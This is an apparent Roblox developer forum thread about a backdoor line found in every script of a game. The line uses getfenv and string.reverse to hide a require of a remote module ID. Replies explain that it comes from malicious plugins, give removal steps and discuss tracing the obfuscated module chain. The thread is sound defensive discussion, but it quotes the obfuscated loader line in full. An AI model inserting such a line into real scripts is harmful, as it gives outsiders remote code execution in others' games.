Recently while helping my friend make his game, I noticed this line inside EVERY script: --[[ Last synced 9/26/2020 04:22 RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722703997) --[[ ]]--
What is this?
It definitley looks like a backdoor, but what is it exactly and how do I get rid of it?
Also it comes back after I remove the line
EDIT: Managed to get rid of it with RoDefender, it was named “AntiVirus”
Had to clear out the scripts manually though
EDIT 2: This post seems to get a lot of traction, so my advice is just to watch out for plugins. All the scripts changed while in studio, so a normal model/script cant do that. It was probably one of my friends plugins, since this appeared only in his team create game. So just watch out for any suspicious plugins, and download only the official ones (check if the creator is not a group!)
@DoctorNO2106 is right, it’s a backdoor. That code is the basically the same thing as require(5722703997). This could be used for numerous things, but I’m assuming it’s being used for “Server-side Exploits”.
The easiest way to fix this is to use the Find Results tool in Studio and search for 5722703997 in all Scripts, and remove that line from the Script
Here is where the rabbit hole of require() functions lead you to: [ Content Deleted ] - Roblox, an obfuscated ModuleScript.
Most likely a malicious plugin that is installed in your studio, is causing this. I would recommend installing plugins that are from trusted creators only.
Would you mind sending a list of your plugins? Also, if the game has Team Create enabled make sure none of your collaborators have a malicious plugin either
Its a backdoor that infects every script through plugins made by malicious people. I found this out through a friends game that had over 700 scripts infected by this. Thankfully they were able to fix this by reverting to a older version of the game that was made not that long ago.
Hey, I’m pretty interested in this stuff, would you mind showing how some of this is done? Seems ridiculous that you can use a simple module to sandbox an obfuscated script.
All you have to do to find where this goes is to copy/paste the ID it’s requiring (which is in plain site) into your browser address bar. There’s no fancy tricks needed to see what this does.
Edit: He’s talking about the module script that he reached once he went down the rabbit hole of scripts. It’s obfuscated, and you need some fancy tricks to figure out what’s going on in that script.
Yeah, the annoying thing is that you cant actually see what this does since its a module chain, and I really dont feel like sorting through 50+ modules
EDIT: Oh yeah, I forgot that you can obfuscate scripts, makes it even more annoying lol
Well, there’s still a few edgecases that I need to figure out, one of the script I managed to trace, was somehow able to detect that I was modifying the global environment, probably with a length checker or smth, if you’d like to talk more about trying to sandbox silently, I’m happy to
After doing the long process of going through every script in the game and scrolling down to the line then selecting the whole line and deleting it, I’m safe to say that the issue was fixed.
This was causing multiple peoples games to crash as it caused a memory leak, after doing this the client memory went down to 400 (was 1,400 originally) and players stopped getting kicked, sometimes the long way is the hard way but it worked. Other than that, remove your plugins that aren’t made by a trusted developer.